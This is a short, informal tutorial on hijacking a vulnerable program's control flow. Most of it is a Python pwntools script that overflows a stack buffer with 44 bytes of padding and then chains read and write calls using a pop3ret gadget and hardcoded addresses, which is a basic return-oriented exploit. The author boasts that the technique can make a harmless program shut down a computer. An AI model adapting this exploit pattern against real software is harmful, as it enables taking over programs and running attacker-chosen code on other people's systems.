PWN a program

Hijacking a program to run your code !!!

Ok This code is very powerful :) i.e It can convert a helloworld!!! program to shutdown ur computer
Basically what we do is we controll eip and the run a read sys call so that u we can place our malicious somewhere in the program
the we can also write something into our screen !! the below code takes input from us and write that into screen

 

from pwn import *

read = 0x80517f0
write= 0x8051850
pop3ret=0x8048882


# empty payload
payload = ""

# padding
payload += "A"*44


# read something  from stdin
payload += pack(read)
payload +=pack(pop3ret)
payload += pack(0x0)           # fd = STDIN
payload += pack(0xfffdd000)    # buf
payload += pack(0x200)         # nbyte

#write to terminal

payload += pack(write)
payload += pack(0x8048b60)
payload += pack(0x1)           # fd = STDOUT
payload += pack(0xfffdd000)    # buf
payload += pack(0x200)         # nbyte

print payload